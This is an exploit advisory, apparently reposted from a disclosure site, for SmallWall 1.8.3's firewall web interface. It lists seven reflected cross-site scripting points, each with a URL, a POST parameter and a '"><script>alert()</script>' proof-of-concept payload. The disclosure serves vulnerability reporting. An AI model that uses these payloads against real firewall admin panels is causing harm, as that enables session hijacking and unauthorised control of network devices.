SmallWall 1.8.3 Cross Site Scripting

SmallWall version 1.8.3 suffers from multiple cross site scripting vulnerabilities.


MD5 | 8fc265776b5cf63883017e8760d5bd11

##################################################################################################################################
# Exploit Title: SmallWall 1.8.3 | Cross-Site Scripting
# Date: 02.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.smallwall.org
# Software Link: http://www.smallwall.org/downloads/generic-pc-1.8.3.iso
# Version: 1.8.3
##################################################################################################################################

Introduction
A long time ago, a very smart guy asked a very simple question. "Why do
firewalls have to be big, slow, and hard to configure?" And he created
m0n0wall.

"m0n0wall was a project aimed at creating a complete, embedded firewall
software package that, when used together with an embedded PC, provided all
the important features of commercial firewall boxes (including ease of use)
at a fraction of the price (free software)."

At this, it was amazingly successful. So successful that the FreeBSD based
core was used as a basis for several other projects such as pfSense,
Askozia, FreeNAS, and nas4free. Recently, a grandchild of m0n0wall was
spawned from pfSense, OPNSense.

But, m0n0wall has retired now, and some of us still feel the need for a
small and lean firewall. SmallWall is that firewall.


#################################################################################


XSS details: Reflected

#################################################################################

XSS1 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
remotenet

PAYLOAD
"><script>alert(1)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
remotegw

PAYLOAD
"><script>alert(2)</script>

#################################################################################

XSS3 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p1myident

PAYLOAD
"><script>alert(3)</script>

#################################################################################

XSS4 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p1lifetime

PAYLOAD
"><script>alert(4)</script>

#################################################################################

XSS5 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p2lifetime

PAYLOAD
"><script>alert(5)</script>

#################################################################################

XSS6 | Reflected

URL
http://192.168.2.200/diag_ping.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(6)</script>

#################################################################################

XSS7 | Reflected

URL
http://192.168.2.200/diag_traceroute.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(7)</script>

#################################################################################

Related Posts